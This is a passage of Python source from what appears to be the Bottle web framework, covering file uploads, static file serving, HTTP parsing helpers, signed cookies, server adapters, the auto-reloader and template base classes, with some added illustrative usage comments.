self.close_callbacks = makelist(close)
def __iter__(self):
return iter(self.iterator)
def close(self):
for func in self.close_callbacks:
func()
class ResourceManager(object):
''' This class manages a list of search paths and helps to find and open
application-bound resources (files).
:param base: default value for :meth:`add_path` calls.
:param opener: callable used to open resources.
:param cachemode: controls which lookups are cached. One of 'all',
'found' or 'none'.
'''
def __init__(self, base='./', opener=open, cachemode='all'):
        self.opener = opener
self.base = base
self.cachemode = cachemode
#: A list of search paths. See :meth:`add_path` for details.
self.path = []
#: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
self.cache = {}
def add_path(self, path, base=None, index=None, create=False):
''' Add a new path to the list of search paths. Return False if the
path does not exist.
:param path: The new search path. Relative paths are turned into
an absolute and normalized form. If the path looks like a file
(not ending in `/`), the filename is stripped off.
:param base: Path used to absolutize relative search paths.
Defaults to :attr:`base` which defaults to ``os.getcwd()``.
:param index: Position within the list of search paths. Defaults
to last index (appends to the list).
The `base` parameter makes it easy to reference files installed
along with a python module or package::
res.add_path('./resources/', __file__)
'''
base = os.path.abspath(os.path.dirname(base or self.base))
path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
path += os.sep
if path in self.path:
self.path.remove(path)
if create and not os.path.isdir(path):
os.makedirs(path)
if index is None:
self.path.append(path)
else:
self.path.insert(index, path)
self.cache.clear()
return os.path.exists(path)
def __iter__(self):
''' Iterate over all existing files in all registered paths. '''
search = self.path[:]
while search:
path = search.pop()
if not os.path.isdir(path): continue
for name in os.listdir(path):
full = os.path.join(path, name)
if os.path.isdir(full): search.append(full)
else: yield full
def lookup(self, name):
''' Search for a resource and return an absolute file path, or `None`.
The :attr:`path` list is searched in order. The first match is
            returned. Symlinks are followed. The result is cached to speed up
future lookups. '''
if name not in self.cache or DEBUG:
for path in self.path:
fpath = os.path.join(path, name)
if os.path.isfile(fpath):
if self.cachemode in ('all', 'found'):
self.cache[name] = fpath
return fpath
if self.cachemode == 'all':
self.cache[name] = None
return self.cache[name]
def open(self, name, mode='r', *args, **kwargs):
''' Find a resource and return a file object, or raise IOError. '''
fname = self.lookup(name)
if not fname: raise IOError("Resource %r not found." % name)
return self.opener(fname, mode=mode, *args, **kwargs)
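# Illustrative sketch of ResourceManager: register a package-relative search
# path, then resolve and open a resource. Directory and file names are
# hypothetical.
def _example_resources():
    res = ResourceManager()
    res.add_path('./data/', base=__file__)    # search next to this module
    if res.lookup('defaults.json'):           # absolute path or None
        return res.open('defaults.json').read()
    return None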
class FileUpload(object):
def __init__(self, fileobj, name, filename, headers=None):
''' Wrapper for file uploads. '''
#: Open file(-like) object (BytesIO buffer or temporary file)
self.file = fileobj
#: Name of the upload form field
self.name = name
#: Raw filename as sent by the client (may contain unsafe characters)
self.raw_filename = filename
#: A :class:`HeaderDict` with additional headers (e.g. content-type)
self.headers = HeaderDict(headers) if headers else HeaderDict()
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int, default=-1)
def get_header(self, name, default=None):
""" Return the value of a header within the mulripart part. """
return self.headers.get(name, default)
@cached_property
def filename(self):
''' Name of the file on the client file system, but normalized to ensure
file system compatibility. An empty filename is returned as 'empty'.
Only ASCII letters, digits, dashes, underscores and dots are
allowed in the final filename. Accents are removed, if possible.
Whitespace is replaced by a single dash. Leading or tailing dots
or dashes are removed. The filename is limited to 255 characters.
'''
fname = self.raw_filename
if not isinstance(fname, unicode):
fname = fname.decode('utf8', 'ignore')
fname = normalize('NFKD', fname).encode('ASCII', 'ignore').decode('ASCII')
fname = os.path.basename(fname.replace('\\', os.path.sep))
fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip()
fname = re.sub(r'[-\s]+', '-', fname).strip('.-')
return fname[:255] or 'empty'
def _copy_file(self, fp, chunk_size=2**16):
read, write, offset = self.file.read, fp.write, self.file.tell()
while 1:
buf = read(chunk_size)
if not buf: break
write(buf)
self.file.seek(offset)
def save(self, destination, overwrite=False, chunk_size=2**16):
''' Save file to disk or copy its content to an open file(-like) object.
If *destination* is a directory, :attr:`filename` is added to the
path. Existing files are not overwritten by default (IOError).
:param destination: File path, directory or file(-like) object.
:param overwrite: If True, replace existing files. (default: False)
:param chunk_size: Bytes to read at a time. (default: 64kb)
'''
if isinstance(destination, basestring): # Except file-likes here
if os.path.isdir(destination):
destination = os.path.join(destination, self.filename)
if not overwrite and os.path.exists(destination):
raise IOError('File exists.')
with open(destination, 'wb') as fp:
self._copy_file(fp, chunk_size)
else:
self._copy_file(destination, chunk_size)
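# Illustrative sketch of handling an upload inside a route callback; the form
# field name and target directory are hypothetical.
def _example_upload():
    upload = request.files.get('datafile')
    if upload is None:
        raise HTTPError(400, 'Missing upload field')
    upload.save('/tmp/uploads')               # stored under upload.filename
    return 'saved %s (%d bytes)' % (upload.filename, upload.content_length)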
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
""" Aborts execution and causes a HTTP error. """
raise HTTPError(code, text)
def redirect(url, code=None):
""" Aborts execution and causes a 303 or 302 redirect, depending on
the HTTP protocol version. """
if not code:
code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
res = response.copy(cls=HTTPResponse)
res.status = code
res.body = ""
res.set_header('Location', urljoin(request.url, url))
raise res
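# Illustrative sketch: abort() and redirect() both raise, so they terminate
# the callback immediately. The condition and target URL are hypothetical.
def _example_abort_redirect(user):
    if user is None:
        abort(401, 'Access denied.')
    if user == 'legacy':
        redirect('/new-location')
    return 'content'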
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
''' Yield chunks from a range in a file. No chunk is bigger than maxread.'''
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
""" Open a file in a safe way and return :exc:`HTTPResponse` with status
        code 200, 304, 403 or 404. The ``Content-Type``, ``Content-Encoding``,
``Content-Length`` and ``Last-Modified`` headers are set if possible.
Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
requests.
:param filename: Name or path of the file to send.
:param root: Root path for file lookups. Should be an absolute directory
path.
:param mimetype: Defines the content-type header (default: guess from
file extension)
:param download: If True, ask the browser to open a `Save as...` dialog
instead of opening the file with the associated program. You can
specify a custom filename as a string. If not specified, the
original filename is used (default: False).
:param charset: The charset to use for files with a ``text/*``
mime-type. (default: UTF-8)
"""
root = os.path.abspath(root) + os.sep
filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
headers = dict()
if not filename.startswith(root):
return HTTPError(403, "Access denied.")
if not os.path.exists(filename) or not os.path.isfile(filename):
return HTTPError(404, "File does not exist.")
if not os.access(filename, os.R_OK):
return HTTPError(403, "You do not have permission to access this file.")
if mimetype == 'auto':
mimetype, encoding = mimetypes.guess_type(filename)
if encoding: headers['Content-Encoding'] = encoding
if mimetype:
if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
mimetype += '; charset=%s' % charset
headers['Content-Type'] = mimetype
if download:
download = os.path.basename(filename if download == True else download)
headers['Content-Disposition'] = 'attachment; filename="%s"' % download
stats = os.stat(filename)
headers['Content-Length'] = clen = stats.st_size
lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
headers['Last-Modified'] = lm
ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
if ims:
ims = parse_date(ims.split(";")[0].strip())
if ims is not None and ims >= int(stats.st_mtime):
headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
return HTTPResponse(status=304, **headers)
body = '' if request.method == 'HEAD' else open(filename, 'rb')
headers["Accept-Ranges"] = "bytes"
ranges = request.environ.get('HTTP_RANGE')
if 'HTTP_RANGE' in request.environ:
ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
headers["Content-Length"] = str(end-offset)
if body: body = _file_iter_range(body, offset, end-offset)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
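# Illustrative sketch of a conventional static file route; the URL prefix and
# root directory are hypothetical.
def _example_static_route(app):
    @app.route('/static/<filepath:path>')
    def serve_static(filepath):
        return static_file(filepath, root='/var/www/static')
    return app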
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
""" Change the debug level.
There is only one debug level supported at the moment."""
global DEBUG
if mode: warnings.simplefilter('default')
DEBUG = bool(mode)
def http_date(value):
if isinstance(value, (datedate, datetime)):
value = value.utctimetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
if not isinstance(value, basestring):
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
return value
def parse_date(ims):
""" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
try:
ts = email.utils.parsedate_tz(ims)
return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone
except (TypeError, ValueError, IndexError, OverflowError):
return None
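# Illustrative example (editor's note): parsing the classic RFC 1123 date
#   parse_date('Sun, 06 Nov 1994 08:49:37 GMT')  -> 784111777.0 on most systems
#   parse_date('not a date')                     -> None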
def parse_auth(header):
""" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
try:
method, data = header.split(None, 1)
if method.lower() == 'basic':
user, pwd = touni(base64.b64decode(tob(data))).split(':',1)
return user, pwd
except (KeyError, ValueError):
return None
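# Illustrative example (editor's note): 'YWxpY2U6c2VjcmV0' is base64 of 'alice:secret'
#   parse_auth('Basic YWxpY2U6c2VjcmV0')  -> ('alice', 'secret')
#   parse_auth('Digest ...')              -> None (only Basic auth is handled)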
def parse_range_header(header, maxlen=0):
    ''' Yield (start, end) ranges parsed from an HTTP Range header. Skip
        unsatisfiable ranges. The end index is non-inclusive.'''
if not header or header[:6] != 'bytes=': return
ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]
for start, end in ranges:
try:
if not start: # bytes=-100 -> last 100 bytes
start, end = max(0, maxlen-int(end)), maxlen
            elif not end:   # bytes=100-    -> all but the first 100 bytes
start, end = int(start), maxlen
else: # bytes=100-200 -> bytes 100-200 (inclusive)
start, end = int(start), min(int(end)+1, maxlen)
if 0 <= start < end <= maxlen:
yield start, end
except ValueError:
pass
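# Illustrative example (editor's note; not part of the original module):
#   list(parse_range_header('bytes=0-499,-500', 10000))
#   -> [(0, 500), (9500, 10000)]   # end offsets are non-inclusive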
def _parse_qsl(qs):
r = []
for pair in qs.replace(';','&').split('&'):
if not pair: continue
nv = pair.split('=', 1)
if len(nv) != 2: nv.append('')
key = urlunquote(nv[0].replace('+', ' '))
value = urlunquote(nv[1].replace('+', ' '))
r.append((key, value))
return r
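# Illustrative example (editor's note):
#   _parse_qsl('a=1&b=2;c=%20')  -> [('a', '1'), ('b', '2'), ('c', ' ')]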
def _lscmp(a, b):
''' Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. '''
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
''' Encode and sign a pickle-able object. Return a (byte) string '''
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
''' Verify and decode an encoded string. Return an object or None.'''
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
return pickle.loads(base64.b64decode(msg))
return None
def cookie_is_encoded(data):
''' Return True if the argument looks like a encoded cookie.'''
return bool(data.startswith(tob('!')) and tob('?') in data)
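# Illustrative round-trip for the three cookie helpers above (editor's note;
# the secret key is hypothetical):
#   token = cookie_encode({'user': 'alice'}, 'my-secret')
#   cookie_is_encoded(token)            -> True
#   cookie_decode(token, 'my-secret')   -> {'user': 'alice'}
#   cookie_decode(token, 'wrong-key')   -> None (signature check fails)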
def html_escape(string):
''' Escape HTML special characters ``&<>`` and quotes ``'"``. '''
    return string.replace('&','&amp;').replace('<','&lt;').replace('>','&gt;')\
                 .replace('"','&quot;').replace("'",'&#039;')
def html_quote(string):
''' Escape and quote a string to be used as an HTTP attribute.'''
return '"%s"' % html_escape(string).replace('\n',' ')\
.replace('\r',' ').replace('\t','	')
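# Illustrative example (editor's note):
#   html_escape('<b>&</b>')   -> '&lt;b&gt;&amp;&lt;/b&gt;'
#   html_quote('a "b"\nc')    -> '"a &quot;b&quot;&#10;c"'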
def yieldroutes(func):
""" Return a generator for routes that match the signature (name, args)
of the func parameter. This may yield more than one route if the function
takes optional keyword arguments. The output is best described by example::
a() -> '/a'
b(x, y) -> '/b/<x>/<y>'
c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>'
d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
"""
path = '/' + func.__name__.replace('__','/').lstrip('/')
spec = getargspec(func)
argc = len(spec[0]) - len(spec[3] or [])
path += ('/<%s>' * argc) % tuple(spec[0][:argc])
yield path
for arg in spec[0][argc:]:
path += '/<%s>' % arg
yield path
def path_shift(script_name, path_info, shift=1):
''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.
:return: The modified paths.
:param script_name: The SCRIPT_NAME path.
        :param path_info: The PATH_INFO path.
:param shift: The number of path fragments to shift. May be negative to
change the shift direction. (default: 1)
'''
if shift == 0: return script_name, path_info
pathlist = path_info.strip('/').split('/')
scriptlist = script_name.strip('/').split('/')
if pathlist and pathlist[0] == '': pathlist = []
if scriptlist and scriptlist[0] == '': scriptlist = []
if shift > 0 and shift <= len(pathlist):
moved = pathlist[:shift]
scriptlist = scriptlist + moved
pathlist = pathlist[shift:]
elif shift < 0 and shift >= -len(scriptlist):
moved = scriptlist[shift:]
pathlist = moved + pathlist
scriptlist = scriptlist[:shift]
else:
empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
raise AssertionError("Cannot shift. Nothing left from %s" % empty)
new_script_name = '/' + '/'.join(scriptlist)
new_path_info = '/' + '/'.join(pathlist)
if path_info.endswith('/') and pathlist: new_path_info += '/'
return new_script_name, new_path_info
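# Illustrative example (editor's note):
#   path_shift('/a', '/b/c', shift=1)    -> ('/a/b', '/c')
#   path_shift('/a/b', '/c', shift=-1)   -> ('/a', '/b/c')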
def auth_basic(check, realm="private", text="Access denied"):
''' Callback decorator to require HTTP auth (basic).
TODO: Add route(check_auth=...) parameter. '''
def decorator(func):
def wrapper(*a, **ka):
user, password = request.auth or (None, None)
if user is None or not check(user, password):
err = HTTPError(401, text)
err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
return err
return func(*a, **ka)
return wrapper
return decorator
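# Illustrative usage (editor's note; credentials below are hypothetical):
#   @route('/admin')
#   @auth_basic(lambda user, pw: user == 'admin' and pw == 'secret')
#   def admin_area():
#       return 'restricted content'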
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
''' Return a callable that relays calls to the current default app. '''
@functools.wraps(getattr(Bottle, name))
def wrapper(*a, **ka):
return getattr(app(), name)(*a, **ka)
return wrapper
route = make_default_app_wrapper('route')
get = make_default_app_wrapper('get')
post = make_default_app_wrapper('post')
put = make_default_app_wrapper('put')
delete = make_default_app_wrapper('delete')
error = make_default_app_wrapper('error')
mount = make_default_app_wrapper('mount')
hook = make_default_app_wrapper('hook')
install = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url = make_default_app_wrapper('get_url')
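# Illustrative usage of the module-level shortcuts above (editor's note):
#   @route('/hello/<name>')
#   def hello(name):
#       return template('Hello {{name}}!', name=name)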
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
quiet = False
def __init__(self, host='127.0.0.1', port=8080, **options):
self.options = options
self.host = host
self.port = int(port)
def run(self, handler): # pragma: no cover
pass
def __repr__(self):
args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()])
return "%s(%s)" % (self.__class__.__name__, args)
class CGIServer(ServerAdapter):
quiet = True
def run(self, handler): # pragma: no cover
from wsgiref.handlers import CGIHandler
def fixed_environ(environ, start_response):
environ.setdefault('PATH_INFO', '')
return handler(environ, start_response)
CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
def run(self, handler): # pragma: no cover
import flup.server.fcgi
self.options.setdefault('bindAddress', (self.host, self.port))
flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
srv = make_server(self.host, self.port, app, server_cls, handler_cls)
srv.serve_forever()
class CherryPyServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from cherrypy import wsgiserver
self.options['bind_addr'] = (self.host, self.port)
self.options['wsgi_app'] = handler
certfile = self.options.get('certfile')
if certfile:
del self.options['certfile']
keyfile = self.options.get('keyfile')
if keyfile:
del self.options['keyfile']
server = wsgiserver.CherryPyWSGIServer(**self.options)
if certfile:
server.ssl_certificate = certfile
if keyfile:
server.ssl_private_key = keyfile
try:
server.start()
finally:
server.stop()
class WaitressServer(ServerAdapter):
def run(self, handler):
from waitress import serve
serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from paste import httpserver
from paste.translogger import TransLogger
handler = TransLogger(handler, setup_console_handler=(not self.quiet))
httpserver.serve(handler, host=self.host, port=str(self.port),
**self.options)
class MeinheldServer(ServerAdapter):
def run(self, handler):
from meinheld import server
server.listen((self.host, self.port))
server.run(handler)
class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
def run(self, handler): # pragma: no cover
import fapws._evwsgi as evwsgi
from fapws import base, config
port = self.port
if float(config.SERVER_IDENT[-2:]) > 0.4:
# fapws3 silently changed its API in 0.5
port = str(port)
evwsgi.start(self.host, port)
# fapws3 never releases the GIL. Complain upstream. I tried. No luck.
if 'BOTTLE_CHILD' in os.environ and not self.quiet:
_stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
_stderr(" (Fapws3 breaks python thread support)\n")
evwsgi.set_base_module(base)
def app(environ, start_response):
environ['wsgi.multiprocess'] = False
return handler(environ, start_response)
evwsgi.wsgi_cb(('', app))
evwsgi.run()
class TornadoServer(ServerAdapter):
""" The super hyped asynchronous server by facebook. Untested. """
def run(self, handler): # pragma: no cover
import tornado.wsgi, tornado.httpserver, tornado.ioloop
container = tornado.wsgi.WSGIContainer(handler)
server = tornado.httpserver.HTTPServer(container)
server.listen(port=self.port,address=self.host)
tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
""" Adapter for Google App Engine. """
quiet = True
def run(self, handler):
from google.appengine.ext.webapp import util
# A main() function in the handler script enables 'App Caching'.
        # Let's make sure it is there. This _really_ improves performance.
module = sys.modules.get('__main__')
if module and not hasattr(module, 'main'):
module.main = lambda: util.run_wsgi_app(handler)
util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from twisted.web import server, wsgi
from twisted.python.threadpool import ThreadPool
from twisted.internet import reactor
thread_pool = ThreadPool()
thread_pool.start()
reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
reactor.listenTCP(self.port, factory, interface=self.host)
reactor.run()
class DieselServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from diesel.protocols.wsgi import WSGIApplication
app = WSGIApplication(handler, port=self.port)
app.run()
class GeventServer(ServerAdapter):
""" Untested. Options:
* `fast` (default: False) uses libevent's http server, but has some
issues: No streaming, no pipelining, no SSL.
* See gevent.wsgi.WSGIServer() documentation for more options.
"""
def run(self, handler):
from gevent import pywsgi, local
if not isinstance(threading.local(), local.local):
msg = "Bottle requires gevent.monkey.patch_all() (before import)"
raise RuntimeError(msg)
if self.options.pop('fast', None):
depr('The "fast" option has been deprecated and removed by Gevent.')
if self.quiet:
self.options['log'] = None
address = (self.host, self.port)
server = pywsgi.WSGIServer(address, handler, **self.options)
if 'BOTTLE_CHILD' in os.environ:
import signal
signal.signal(signal.SIGINT, lambda s, f: server.stop())
server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
def run(self,handler):
from socketio import server
address = (self.host, self.port)
server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
""" Untested. See http://gunicorn.org/configure.html for options. """
def run(self, handler):
from gunicorn.app.base import Application
config = {'bind': "%s:%d" % (self.host, int(self.port))}
config.update(self.options)
class GunicornApplication(Application):
def init(self, parser, opts, args):
return config
def load(self):
return handler
GunicornApplication().run()
class EventletServer(ServerAdapter):
""" Untested """
def run(self, handler):
from eventlet import wsgi, listen
try:
wsgi.server(listen((self.host, self.port)), handler,
log_output=(not self.quiet))
except TypeError:
# Fallback, if we have old version of eventlet
wsgi.server(listen((self.host, self.port)), handler)
class RocketServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from rocket import Rocket
server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
server.start()
class BjoernServer(ServerAdapter):
""" Fast server written in C: https://github.com/jonashaag/bjoern """
def run(self, handler):
from bjoern import run
run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
""" Untested. """
adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
def run(self, handler):
for sa in self.adapters:
try:
return sa(self.host, self.port, **self.options).run(handler)
except ImportError:
pass
server_names = {
'cgi': CGIServer,
'flup': FlupFCGIServer,
'wsgiref': WSGIRefServer,
'waitress': WaitressServer,
'cherrypy': CherryPyServer,
'paste': PasteServer,
'fapws3': FapwsServer,
'tornado': TornadoServer,
'gae': AppEngineServer,
'twisted': TwistedServer,
'diesel': DieselServer,
'meinheld': MeinheldServer,
'gunicorn': GunicornServer,
'eventlet': EventletServer,
'gevent': GeventServer,
'geventSocketIO':GeventSocketIOServer,
'rocket': RocketServer,
'bjoern' : BjoernServer,
'auto': AutoServer,
}
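# Editor's note: run() accepts any key of server_names for its `server`
# argument, e.g. run(app, server='cherrypy', host='0.0.0.0', port=8080);
# extra keyword arguments are forwarded to the chosen ServerAdapter.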
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
""" Import a module or fetch an object from a module.
* ``package.module`` returns `module` as a module object.
* ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
* ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.
The last form accepts not only function calls, but any type of
expression. Keyword arguments passed to this function are available as
local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``
"""
module, target = target.split(":", 1) if ':' in target else (target, None)
if module not in sys.modules: __import__(module)
if not target: return sys.modules[module]
if target.isalnum(): return getattr(sys.modules[module], target)
package_name = module.split('.')[0]
namespace[package_name] = sys.modules[package_name]
return eval('%s.%s' % (module, target), namespace)
def load_app(target):
""" Load a bottle application from a module and make sure that the import
does not affect the current default application, but returns a separate
application object. See :func:`load` for the target parameter. """
global NORUN; NORUN, nr_old = True, NORUN
try:
tmp = default_app.push() # Create a new "default application"
rv = load(target) # Import the target module
return rv if callable(rv) else tmp
finally:
default_app.remove(tmp) # Remove the temporary added default application
NORUN = nr_old
_debug = debug
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
interval=1, reloader=False, quiet=False, plugins=None,
debug=None, **kargs):
""" Start a server instance. This method blocks until the server terminates.
:param app: WSGI application or target string supported by
:func:`load_app`. (default: :func:`default_app`)
:param server: Server adapter to use. See :data:`server_names` keys
for valid names or pass a :class:`ServerAdapter` subclass.
(default: `wsgiref`)
        :param host: Server address to bind to. Pass ``0.0.0.0`` to listen on
all interfaces including the external one. (default: 127.0.0.1)
:param port: Server port to bind to. Values below 1024 require root
privileges. (default: 8080)
:param reloader: Start auto-reloading server? (default: False)
:param interval: Auto-reloader interval in seconds (default: 1)
:param quiet: Suppress output to stdout and stderr? (default: False)
:param options: Options passed to the server adapter.
"""
if NORUN: return
if reloader and not os.environ.get('BOTTLE_CHILD'):
try:
lockfile = None
fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
os.close(fd) # We only need this file to exist. We never write to it
while os.path.exists(lockfile):
args = [sys.executable] + sys.argv
environ = os.environ.copy()
environ['BOTTLE_CHILD'] = 'true'
environ['BOTTLE_LOCKFILE'] = lockfile
p = subprocess.Popen(args, env=environ)
while p.poll() is None: # Busy wait...
os.utime(lockfile, None) # I am alive!
time.sleep(interval)
if p.poll() != 3:
if os.path.exists(lockfile): os.unlink(lockfile)
sys.exit(p.poll())
except KeyboardInterrupt:
pass
finally:
if os.path.exists(lockfile):
os.unlink(lockfile)
return
try:
if debug is not None: _debug(debug)
app = app or default_app()
if isinstance(app, basestring):
app = load_app(app)
if not callable(app):
raise ValueError("Application is not callable: %r" % app)
for plugin in plugins or []:
app.install(plugin)
if server in server_names:
server = server_names.get(server)
if isinstance(server, basestring):
server = load(server)
if isinstance(server, type):
server = server(host=host, port=port, **kargs)
if not isinstance(server, ServerAdapter):
raise ValueError("Unknown or unsupported server: %r" % server)
server.quiet = server.quiet or quiet
if not server.quiet:
_stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
_stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
_stderr("Hit Ctrl-C to quit.\n\n")
if reloader:
lockfile = os.environ.get('BOTTLE_LOCKFILE')
bgcheck = FileCheckerThread(lockfile, interval)
with bgcheck:
server.run(app)
if bgcheck.status == 'reload':
sys.exit(3)
else:
server.run(app)
except KeyboardInterrupt:
pass
except (SystemExit, MemoryError):
raise
except:
if not reloader: raise
if not getattr(server, 'quiet', quiet):
print_exc()
time.sleep(interval)
sys.exit(3)
class FileCheckerThread(threading.Thread):
''' Interrupt main-thread as soon as a changed module file is detected,
        the lockfile gets deleted or gets too old. '''
def __init__(self, lockfile, interval):
threading.Thread.__init__(self)
self.lockfile, self.interval = lockfile, interval
#: Is one of 'reload', 'error' or 'exit'
self.status = None
def run(self):
exists = os.path.exists
mtime = lambda path: os.stat(path).st_mtime
files = dict()
for module in list(sys.modules.values()):
path = getattr(module, '__file__', '') or ''
if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
if path and exists(path): files[path] = mtime(path)
while not self.status:
if not exists(self.lockfile)\
or mtime(self.lockfile) < time.time() - self.interval - 5:
self.status = 'error'
thread.interrupt_main()
for path, lmtime in list(files.items()):
if not exists(path) or mtime(path) > lmtime:
self.status = 'reload'
thread.interrupt_main()
break
time.sleep(self.interval)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.status: self.status = 'exit' # silent exit
self.join()
return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
def __init__(self, message):
HTTPError.__init__(self, 500, message)
class BaseTemplate(object):
""" Base class and minimal API for template adapters """
extensions = ['tpl','html','thtml','stpl']
settings = {} #used in prepare()
defaults = {} #used in render()
def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
""" Create a new template.
If the source parameter (str or buffer) is missing, the name argument
is used to guess a template filename. Subclasses can assume that
self.source and/or self.filename are set. Both are strings.
The lookup, encoding and settings parameters are stored as instance
variables.
The lookup parameter stores a list containing directory paths.
The encoding parameter should be used to decode byte strings or files.
The settings parameter contains a dict for engine-specific settings.
"""
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = [os.path.abspath(x) for x in lookup]
self.encoding = encoding
self.settings = self.settings.copy() # Copy from class variable
self.settings.update(settings) # Apply
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=[]):
""" Search name in all directories specified in lookup.
First without, then with common extensions. Return first hit. """
if not lookup:
depr('The template lookup path list should not be empty.') #0.12
lookup = ['.']
if os.path.isabs(name) and os.path.isfile(name):
depr('Absolute template path names are deprecated.') #0.12
return os.path.abspath(name)
for spath in lookup:
spath = os.path.abspath(spath) + os.sep
fname = os.path.abspath(os.path.join(spath, name))
if not fname.startswith(spath): continue
if os.path.isfile(fname): return fname
for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
''' This reads or sets the global settings stored in class.settings. '''
if args:
cls.settings = cls.settings.copy() # Make settings local to class
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
""" Run preparations (parsing, caching, ...).
It should be possible to call this again to refresh a template or to
update settings.
"""
raise NotImplementedError
def render(self, *args, **kwargs):
""" Render the template with the specified local variables and return
a single byte or unicode string. If it is a byte string, the encoding
must match self.encoding. This method must be thread-safe!
Local variables may be provided in dictionaries (args)
or directly, as keywords (kwargs).
"""
raise NotImplementedError
class MakoTemplate(BaseTemplate):
def prepare(self, **options):
from mako.template import Template
from mako.lookup import TemplateLookup
options.update({'input_encoding':self.encoding})
